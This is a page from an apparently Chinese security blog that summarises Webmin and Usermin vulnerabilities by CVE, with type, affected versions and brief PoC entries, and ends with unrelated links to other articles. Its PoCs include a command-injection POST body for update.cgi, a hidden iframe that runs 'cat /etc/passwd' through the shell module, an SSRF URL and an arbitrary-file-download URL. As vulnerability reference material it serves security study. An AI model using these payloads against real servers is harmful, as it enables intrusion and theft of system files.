简介

开发语言

PHP

用途
系统管理

CVE-2019-15642

Date
2019.7

类型
远程代码执行

影响范围
Webmin <= 1.920

复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";

分析

反序列化导致远程代码执行

CVE-2019-15107

Date



类型

远程代码执行

影响范围

Webmin <= 1.920

前置条件
/password_change.cgi可访问

复现
POC | EXP


分析

CVE-2019-12840

Date

2019.6

类型

远程代码执行

影响范围

v 1.910

复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi 
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi 
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages


分析

XSS vulnerability that leads to Remote Code Execution

Date



类型

XSS导致远程代码执行

影响范围

Webmin version 1.850

前置条件
/at/create_job.cgi可访问
 

CSRF

Date



类型

CSRF

影响范围

Webmin version 1.850

SSRF

Date



类型

SSRF

影响范围

Webmin version 1.850

复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com

HTML Email Command Execution Vulnerability

Date

类型

远程命令执行



影响范围
Usermin versions <= 1.080


复现

POC|EXP

<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv

ictim&history=' height=0 width=0></iframe>

任意文件下载

Date



类型

任意文件下载

影响范围

DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0

前置条件

/dansguardian/edit.cgi 可访问

复现

POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]

应用安全 - 工具 | 平台 -webmin - 漏洞 - 汇总的更多相关文章

  1. 应用安全 - 工具 | 平台 - Weblogic - 漏洞 - 汇总

    控制台路径 | 弱口令  前置条件 /console CVE-2016-0638  Date 类型远程代码执行 影响范围10.3.6, 12.1.2, 12.1.3, 12.2.1  CVE-2016 ...

  2. 应用安全 - 工具 | 平台 - gitlist - 漏洞 - 汇总

    简介 用途 Github仓库查看器 CVE-2014-4511 Date 类型 远程代码执行 影响范围 gitlist 0.4.0及之前版本

  3. 应用安全 - 平台 | 工具 - Centreon Web - 漏洞 - 汇总

    简介 产地 法国 用途 监控 分布 CVE-2019-16405 https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html

  4. 应用安全 - 工具 | 数据库 - redis - 漏洞 - 汇总

    未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析

  5. 应用安全 - 软件漏洞 - 可视化平台kibana漏洞汇总

    CVE-2019-7609  Date: 类型: RCE 前置条件: Timelion And Canvas 影响范围: kibana-RCE < PoC | ExP: https://gith ...

  6. ETH&EOS开发资源及工具集合(完整汇总版)

    ETH&EOS开发资源及工具集合(完整汇总版) 3113 ETH开发资源篇 一.开发语言 ·         Solidity - 官方推荐以太坊智能合约开发语言,也是目前最为主流的智能合约语 ...

  7. Android开发之《常用工具及文档汇总》

    GreenVPN:https://www.getgreenjsq.com/ Android开发工具.资料下载汇总:http://androiddevtools.cn/#img-size-handle- ...

  8. 【转】使用kettle工具遇到的问题汇总及解决方案

    使用kettle工具遇到的问题汇总及解决方案   转载文章版权声明:本文转载,原作者薄海 ,原文网址链接 http://blog.csdn.net/bohai0409/article/details/ ...

  9. 【架构】技术-工具-平台-语言&框架

    技术-工具-平台-语言&框架 Techniques | Technology Radar | ThoughtWorks

随机推荐

  1. shell知识点(一)

    Shell1.概述Shell是一个命令行解释器,它接收应用程序/用户命令,然后调用操作系统内核还是一个功能相当强大的编程语言,易编写.易调试.灵活性强2.shell解析器查看linux提供的shell ...

  2. Liunx centos 系统 修改hostname

    1 centos6下修改hostname [root@centos6 ~]$ hostname # 查看当前的hostnmae centos6.magedu.com [root@centos6 ~]$ ...

  3. C++类模板——博客链接

    https://www.jianshu.com/p/70ca94872418 C++类模板,你看我就够了 值得学习~

  4. python5---输入用户名和密码,登录三次不成功,无法再次登录

    #!/usr/bin/env python_user = "harry"_password = "123456"for i in range(3): usern ...

  5. Python之基于十六进制判断文件类型

    核心代码: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : suk import struct from io import Byt ...

  6. Pollard Rho 算法简介

    \(\text{update 2019.8.18}\) 由于本人将大部分精力花在了cnblogs上,而不是洛谷博客,评论区提出的一些问题直到今天才解决. 下面给出的Pollard Rho函数已给出散点 ...

  7. select和FD_SET等

    转自:http://blog.csdn.net/cstarbl/article/details/7645298 select函数用于在非阻塞中,当一个套接字或一组套接字有信号时通知你,系统提供sele ...

  8. JS框架_(Qrcode.js)将你的内容转换成二维码格式

    百度云盘 传送门 密码:304e 输入网址点击按钮生成二维码,默认为我的博客首页 二维码格式演示 <!DOCTYPE html> <html lang="en"& ...

  9. openvas 安装

    NMAP apt-get update & apt-get upgrade kali的更新命令 https://www.fujieace.com/kali-linux/update-sourc ...

  10. 20175215 2018-2019-2 第六周java课程学习总结

    第七章 内部类与异常类 1.内部类 Java支持在一个类中定义另一个类,这样的类称作内部类,而包含内部类的类成为内部类的外嵌类 内部类和外嵌类之间重要关系如下 内部类的外嵌类的成员变量在内部类中仍然有 ...